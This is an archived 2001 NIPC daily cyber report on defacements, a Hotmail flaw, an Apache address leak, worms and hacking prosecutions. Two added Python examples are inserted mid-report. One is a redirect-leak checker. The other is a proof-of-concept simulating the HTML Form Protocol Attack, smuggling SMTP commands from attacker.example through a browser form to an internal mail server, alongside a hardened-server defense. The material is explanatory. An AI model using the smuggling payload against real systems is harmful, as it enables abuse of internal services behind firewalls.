-----Original Message-----
From: NIPC Watch [mailto:nipc.watch@private]
Sent: Tuesday, August 21, 2001 9:12 AM
To: daily@private
Subject: NIPC Daily Report, 21 August 2001

Significant Changes and Assessment - No significant changes

Private Sector - Until recently, sites running AIX, IBM's commercial Unix-based operating system, barely registered in the Alldas defacement archive. Of the more than 22,000 home pages defaced in the past 18 months, just 47 sites, less than 1%, were running AIX; Windows, by contrast, accounts for 65% of defacements. But 32 of those AIX intrusions have occurred in the past three days. Among the victims, ironically, was an IBM corporate Web site in Indonesia. On 18 August the defacers, a group calling itself Savvy Crew, changed the site's home page to add the messages "In Linux We Trust" and "SavvyCrew did penetrate this lame IBM server." The rise in AIX defacements has coincided with the release of several new programs that exploit old flaws in the operating system. (Source: Newsbytes, 21 August)

According to the hacker online publication Root-Core Network, a security hole in Microsoft's Web-based e-mail service Hotmail allows any account holder to view other users' private messages. In a bulletin posted on its Web site on 18 August, Root-Core members demonstrated how specially crafted URLs could bypass the password check on the Hotmail servers. A Root-Core editor who goes by the handle "Digital-Vortex" reported that Hotmail has been informed of the hole. Hotmail sign-in is handled by Microsoft's Passport, a service promoted as a "single sign-in" approach to authentication that can span multiple Web sites. (Source: Infosec News, 20 August)

A security vulnerability in the Apache Web server results in the disclosure of the server's internal address. The problem occurs when an HTTP request for a directory is submitted to the server.
If the requested path does not end with a trailing "/" character, the server answers with a 3xx redirection status code, indicating that further action must be taken to fulfill the request, and the 'Location' response header it returns carries the server's own address. Where the request was relayed to a server behind a firewall, that header can disclose the server's internal network address to the outside client. (Source: InfoSec News, 20 August)

A group of security companies is combining efforts to better combat new, sophisticated attacks such as those posed by the Code Red and Leave worms. This week McAfee will announce a research and development partnership with three anti-DDoS vendors, Arbor Networks Inc., Asta Networks Inc. and Mazu Networks Inc., with the goal of developing new technologies and techniques to detect and prevent DDoS attacks. The alliance, a first among the normally isolationist security vendors, will involve the member companies exchanging research as well as researchers, in what officials said is just the beginning of a far-reaching initiative. The long-term goal of the partnership is to develop and deploy a solution that lets Internet service providers and data centers identify when their networks are under DDoS attack and also discover and eliminate the "zombies" attackers use to launch their assaults. (Source: ZDNet.com, 21 August)

International - Kaspersky Labs announced that it has registered infections by the Internet worm "Newpic," which is spreading via the popular MSN Messenger instant-messaging network. The malicious program was detected at the beginning of last week, at which time it was added to the Kaspersky Anti-Virus database along with the necessary defense procedures. However, the first incidents connected with "Newpic" were noted this past weekend.
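Referring back to the Apache redirect item in the Private Sector section above: the practical check is to request a directory without its trailing slash and inspect the Location header of the 3xx answer. The following is an added example, not code from the report or from the Apache project. The three raw responses are constructed to resemble the redirect described (a request for "/images" answered with 301 and a self-referencing Location); the hostnames www.example.com, web01.corp.lan and the 10.1.2.3 address are assumptions.

```python
"""Check an HTTP 3xx redirect for a Location header that leaks an address
other than the one the client asked for.

Added example, not from the NIPC report. The responses below are
constructed, not captured from a real server.
"""
import ipaddress
from urllib.parse import urlsplit

# Constructed: a server behind a firewall that built its self-referencing
# URL from its internal address.
LEAKY_RESPONSE = (
    b"HTTP/1.1 301 Moved Permanently\r\n"
    b"Date: Tue, 21 Aug 2001 13:12:00 GMT\r\n"
    b"Server: Apache/1.3.19 (Unix)\r\n"
    b"Location: http://10.1.2.3/images/\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><body>Moved</body></html>"
)

# Constructed: same redirect, but the server's canonical name is an
# internal hostname rather than an IP address.
HOSTNAME_RESPONSE = (
    b"HTTP/1.1 301 Moved Permanently\r\n"
    b"Server: Apache/1.3.19 (Unix)\r\n"
    b"Location: http://web01.corp.lan/images/\r\n"
    b"\r\n"
)

# Constructed: the expected, non-leaking answer, redirecting to the public
# hostname the client used.
CLEAN_RESPONSE = (
    b"HTTP/1.1 301 Moved Permanently\r\n"
    b"Server: Apache/1.3.19 (Unix)\r\n"
    b"Location: http://www.example.com/images/\r\n"
    b"\r\n"
)


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status_code, {lowercase header: value})."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def redirect_leak(raw: bytes, requested_host: str):
    """Classify a redirect.

    Returns ("private-ip", host) if the Location host is a literal private,
    loopback or link-local IP address, ("other-host", host) if it is any
    other host that differs from the one the client requested, and None if
    the response is not a redirect or points back at the requested host.
    """
    status, headers = parse_response(raw)
    if not 300 <= status < 400 or "location" not in headers:
        return None
    host = urlsplit(headers["location"]).hostname
    if host is None or host == requested_host.lower():
        return None
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return ("other-host", host)  # a differing hostname, still worth a look
    if addr.is_private or addr.is_loopback or addr.is_link_local:
        return ("private-ip", host)
    return ("other-host", host)


if __name__ == "__main__":
    for label, raw in (("leaky", LEAKY_RESPONSE),
                       ("hostname", HOSTNAME_RESPONSE),
                       ("clean", CLEAN_RESPONSE)):
        print(label, redirect_leak(raw, "www.example.com"))
```

The redirect itself is normal behaviour; the leak is in how Apache composes the self-referencing URL. Apache builds it from the ServerName directive when UseCanonicalName is On (the 1.3 default), so a server whose ServerName is unset or set to an internal name advertises that name to every client that forgets a trailing slash. Setting ServerName to the public hostname, or UseCanonicalName Off so the client-supplied Host header is used, stops the disclosure.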
"Newpic" is an executable program written in Visual Basic and compiled into an EXE file about 50 KB in length. When the worm-carrying file is run, "Newpic" displays a fake message about a file-processing error to hide its activity. The worm then registers itself under the auto-run registry key so that it is executed automatically on every subsequent reboot. (Source: InfoSec News, 20 August)

An independent computer programmer in Germany has discovered that malicious hackers could use seemingly ordinary-looking Web pages to send commands to servers behind barriers such as corporate firewalls. Jochen Topf found that many common Web browsers can be tricked into passing on commands from hackers without the browsers' users knowing. The trick, Topf wrote last week in a paper called "The HTML Form Protocol Attack," relies on the same HTML form technology that builders of legitimate Web pages use to capture information visitors enter into online forms. Topf's paper is available at http://www.remote.org/jochen. (Source: Newsbytes, 20 August)

A computer virus has intruded into the administrative information systems of the Japan Coast Guard, damaging part of the application software. The Japan Coast Guard suspended its e-mail servers after it discovered the infection on 20 August, to let an anti-virus service company develop a vaccine for the virus, but the prospect of system restoration is still far from certain. The coast guard's computer systems are temporarily out of action, but its home page is operating as usual. (Source: JPP, 20 August)

On 20 August, hackers changed the main Web page of Turkey's Finance Ministry, causing it to crash. The hackers altered the page and left a note signed by the Independent Hackers Group. The Finance Ministry's data-processing personnel have said that only the main page of the Web site was changed and that no information has been lost. They said that there is a problem with the security script. (Source: Istanbul NTV, 20 August)

Government - A Seattle federal court handed down a 13-count indictment last week accusing Alexey Vladimirovich Ivanov, of Chelyabinsk, Russia, of hacking into a California-based Internet service provider (ISP) and attempting to extort money from the company's customers. According to court documents, Ivanov was charged with hacking into the networks of VPM, an ISP based in Folsom, California. He allegedly threatened to damage computers connected to the network unless he was paid a certain amount by each victim. Ivanov and his associate Vasiliy Gorshkov were arrested in Seattle last November after coming to the U.S. for what they believed was a job interview at a Seattle-based high-tech company called Invita. Both men have also been indicted on similar federal computer intrusion charges in Santa Ana, Calif., and in New Jersey. According to U.S. Attorney Mark L. Krotoski, Ivanov faces a maximum penalty of five years in prison and a fine of up to $250,000 on each of the charges. (Source: Newsbytes, 21 August)

Military - NTR

U.S. SECTOR INFORMATION:

Water Supply - Three towboat companies and the man who owns them have pleaded guilty to dumping oil into the Mississippi River. Glenn McKinney and his companies, McKinney Towing, McKinney Harbor Towing and Slidell Towing, could be ordered to pay a variety of fines and restitution for violating the federal Clean Water Act. McKinney pleaded guilty on 17 August in U.S. District Court on behalf of himself and the three companies. For at least five years, until May 2000, McKinney's boats pumped a water-and-oil mix from the hulls of at least nine boats into the Mississippi River; the mix accumulated because the boats were in a constant state of disrepair. The illegal discharges stopped when Louisiana State Police, the federal Environmental Protection Agency and Baton Rouge Police searched the company's Baton Rouge facility and took samples from the boats. The towing companies have agreed to pay $40,000 in restitution to the State Police "Right to Know" fund and $40,000 to the Southern Environmental Enforcement Network. (Source: Associated Press, 20 August)

Gas and Oil Storage Distribution - NTR
Government Services - NTR
Emergency Services - NTR
Electrical Power - NTR
Telecommunications - NTR
Banking and Finance - NTR
Transportation - NTR

NOTE: Please understand that this is for informational purposes only and does not constitute any verification of the information contained in the report nor does this constitute endorsement by the NIPC or the FBI.
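On the HTML Form Protocol Attack item in the International section: the report says only that ordinary HTML forms can be made to carry commands to servers behind a firewall, so here is an added example of the mechanism, written for this page and not taken from Topf's paper or the report. A form with enctype="text/plain" makes the browser send the fields as "name=value" lines, and a <textarea> value may itself contain line breaks, so an attacker controls whole lines of what arrives at a line-oriented service on whatever host and port the form's action names. The toy SMTP-style server, the hostname mail.internal and the field name "x" are all constructed for the example; the hardened variant shows the server-side defense of dropping a connection whose first line is an HTTP request line.

```python
"""Simulate the HTML Form Protocol Attack: what a victim's browser puts on
the wire for a text/plain form aimed at a non-HTTP port, and how a
line-oriented server reads it.

Added example, not from Topf's paper or the NIPC report. The form, the
target (mail.internal:25) and the toy server are constructed.
"""


def text_plain_body(fields):
    """Encode fields the way enctype="text/plain" does: name=value, each
    pair terminated by CRLF, with values sent as-is, line breaks included."""
    return "".join(f"{name}={value}\r\n" for name, value in fields)


def build_post(host, port, path, body):
    """Assemble the raw HTTP request the browser transmits for
    <form method="POST" action="http://host:port/path" enctype="text/plain">."""
    return (
        f"POST {path} HTTP/1.0\r\n"
        f"Host: {host}:{port}\r\n"
        f"Content-Type: text/plain\r\n"
        f"Content-Length: {len(body)}\r\n"
        f"\r\n"
        f"{body}"
    )


# Constructed attack page: a single <textarea name="x"> whose value starts
# with a line break so that every following line is an SMTP command.
ATTACK_FIELDS = [(
    "x",
    "\r\nHELO attacker.example"
    "\r\nMAIL FROM:<attacker@evil.example>"
    "\r\nRCPT TO:<victim@internal.example>"
    "\r\nDATA"
    "\r\nSubject: sent by your browser"
    "\r\n"
    "\r\nhello"
    "\r\n."
    "\r\nQUIT",
)]
ATTACK_REQUEST = build_post("mail.internal", 25, "/", text_plain_body(ATTACK_FIELDS))

SMTP_VERBS = ("HELO", "MAIL", "RCPT", "DATA", "QUIT")


def naive_smtp_server(raw):
    """Toy line-oriented server: it rejects each line it does not understand
    (the HTTP request line, the headers, the "x=" prefix) but keeps reading,
    which is exactly what lets the attacker's lines through.
    Returns the command lines it accepted."""
    accepted = []
    for line in raw.split("\r\n"):
        verb = line.split(" ", 1)[0].upper()
        if verb in SMTP_VERBS:
            accepted.append(line)
    return accepted


def hardened_server(raw):
    """Same server, but it closes the connection as soon as the first line
    looks like an HTTP request line, which no legitimate SMTP client sends.
    Returns the accepted commands: none for browser-originated input."""
    first = raw.split("\r\n", 1)[0]
    method = first.split(" ", 1)[0]
    if method in ("GET", "POST", "HEAD") and first.endswith(("HTTP/1.0", "HTTP/1.1")):
        return []
    return naive_smtp_server(raw)


if __name__ == "__main__":
    print(ATTACK_REQUEST)
    print("naive server accepted:", naive_smtp_server(ATTACK_REQUEST))
    print("hardened server accepted:", hardened_server(ATTACK_REQUEST))
```

The victim never sees the request; the form can be submitted by script when the page loads, and the browser, not the attacker, is the machine inside the firewall, so the filtering that blocks the attacker's own packets does not apply. The two remedies that followed this class of attack are the ones the code hints at: browsers now refuse to connect to a list of well-known non-HTTP ports (25 among them), and line-oriented servers can drop any session whose first line is an HTTP method, as hardened_server does.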
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:24:18 PDT